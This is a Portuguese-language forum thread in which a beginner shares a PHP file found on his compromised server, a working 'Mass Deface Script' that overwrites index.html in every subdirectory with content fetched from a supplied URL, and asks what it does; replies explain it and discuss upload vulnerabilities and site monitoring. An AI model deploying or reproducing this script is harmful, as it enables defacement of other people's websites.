Publicado em 27 de jul.

entender o que este arquivo estava executando

Ola sou iniciante na area e encontrei este arquivo dentro de meu servidor :

<?php

Script: Mass Deface Script

echo "<center><textarea rows='10' cols='100'>";

$defaceurl = $_POST['massdefaceurl'];

$dir = $_POST['massdefacedir'];

echo $dir."\n";

if (is_dir($dir)) {

if ($dh = opendir($dir)) {

while (($file = readdir($dh)) !== false) {

if(filetype($dir.$file)=="dir"){

 $newfile=$dir.$file."/index.html";

 echo $newfile."\n";

 if (!copy($defaceurl, $newfile)) {

 echo "failed to copy $file...\n";

 }

 }

 }

 closedir($dh);

 }

}

echo "</textarea></center>";

?>

 

 

<td align=right>Mass Defacement:</td><br>

</div>

<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>

<div class="style31">

[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>

[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>

<input type='submit' name='execmassdeface' value='Execute'></div>

</form></td>

Podem me ajudar a entender o que este arquivo estava execultando ?

Discussão (3)

Entre ou cadastre-se para participar da discussão

Entrar Criar conta

Beraldo· 27 de jul.

O script pega uma URL (massdefaceurl) e a define em todos os arquivos do seu servidor. Ou seja, todos os arquivos serão iguais (um arquivo malicioso definido em massdefaceurl)

Tópico movido
Entretenimento -> PHP

cesar rocha· 27 de jul.

Comecei a procurar depois de dois sites terem as index reescritas.

estou revendo minha segurança, penso que este arquivo foi upado por algum formularios que permitiu upload de .php.

O que acha ?

Agora fiquei preocupado , tenho 9 sites neste servidor e estou monitorando eles.

Sabe me dizer como faço para criar um algoritimo que possibilita minhas index me apresentarem como online em uma pagina onde posso ficar monitorando. Como se eu tivesse um sistema que me informasse que meus sites estão ok.

Quero colocar algo que fique se comunicando comigo , então se tiver algum problemas com um site vou saber .

Beraldo· 27 de jul.

O arquivo pode ter sido enviado em algum form de upload ou pode haver alguma outra vulnerabilidade que permitiu a execução de alguma rotina que baixasse o script.

Existem vários serviços de monitoramento. Uptime Robot é um deles (eu utilizo). Eles vão verificar ping, http etc. Ou seja, por mais que o site seja hackeado, ele vai responder ping e retornar status 200. Dessa forma, esses serviços de simples monitoramento não resolverão seu problema.

Você pode criar um rotina que faz acessos frequentes ao sites e verifica o conteúdo deles. Desde que cada site tenha algo no código-fonte que o identifique, será simples fazer isso.